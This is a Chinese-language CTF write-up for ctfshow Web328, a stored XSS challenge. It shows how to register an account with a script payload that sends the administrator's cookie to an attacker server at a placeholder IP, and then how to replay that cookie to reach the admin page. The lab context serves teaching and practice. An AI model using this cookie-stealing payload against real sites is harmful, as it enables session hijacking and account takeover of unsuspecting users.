当前位置: 首页 > article >正文

ctfshow(328)--XSS漏洞--存储型XSS

Web328

简单阅读一下页面。
是一个登录系统,存在一个用户管理数据库。
那么我们注册一个账号,在账号或者密码中植入HTML恶意代码,当管理员访问用户管理数据库页面时,就会触发我们的恶意代码。

在这里插入图片描述

在这里插入图片描述

思路

我们向数据库中写入盗取管理员Cookie的恶意代码,然后利用管理员Cookie跳过账号密码验证,直接登录管理员界面即可。

在注册页面,把script、body、svg、img标签都试一下,看看哪个能成功获取到Cookie。
最后使用script标签成功了。
账号和密码都输入下面的payload:

<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

然后在登录界面登录一下,就会发现自己服务器获取到了管理员的cookie

这时候我们访问用户管理界面并抓包,将自己的Cookie修改为管理员的Cookie,页面会显示 欢迎你,admin
但是此时下面的用户名和密码还没有出现。我们需要继续抓包,发现又会抓到一个关于下面内容的包,将这个包的Cookie也改为管理员Cookie,我们才能成功获取flag。
在这里插入图片描述得到flag。

这里的管理员cookie更换的频率挺快的,能不能登录有点看运气,不知道有没有更稳定的方法/


http://www.kler.cn/a/396711.html

相关文章:

  • C++:基于红黑树封装map和set
  • .netcore + postgis 保存地图围栏数据
  • Day 65 || SPFA、判断负权回路、bellman_ford之单源有限最短路
  • 一种时间戳对齐的方法(离线)
  • QSS 设置bug
  • 跟我学C++中级篇——Design Patterns的通俗说法
  • 2024年11月第2个交易周收盘总结
  • VLC-QT----Linux编译并运行示例
  • 信息安全工程师(83)Windows操作系统安全分析与防护
  • aws中AcmClient.describeCertificate返回值中没有ResourceRecord
  • RedisTemplate序列化设置
  • 【阅读记录-章节2】Build a Large Language Model (From Scratch)
  • 程序代码设计模式之模板方法模式(1)
  • 3.dns域名解析服务
  • DHTMLX-gantt组件显示不同的颜色
  • 嵌入式linux中块设备驱动框架基本实现
  • 基于物联网的智能超市快速结算系统
  • mindspore发布件
  • Linux下编译安装Nginx
  • MongoDB创建联合唯一性约束
  • 数仓建设之Oracle常见语法学习
  • STM32 标准库函数 GPIO_SetBits、GPIO_ResetBits、GPIO_WriteBit、GPIO_Write 区别
  • 万字长文解读机器学习——感知机、MLP、SVM
  • [GXYCTF2019]BabyUpload--详细解析
  • 三分频电路设计
  • MyBatis CRUD快速入门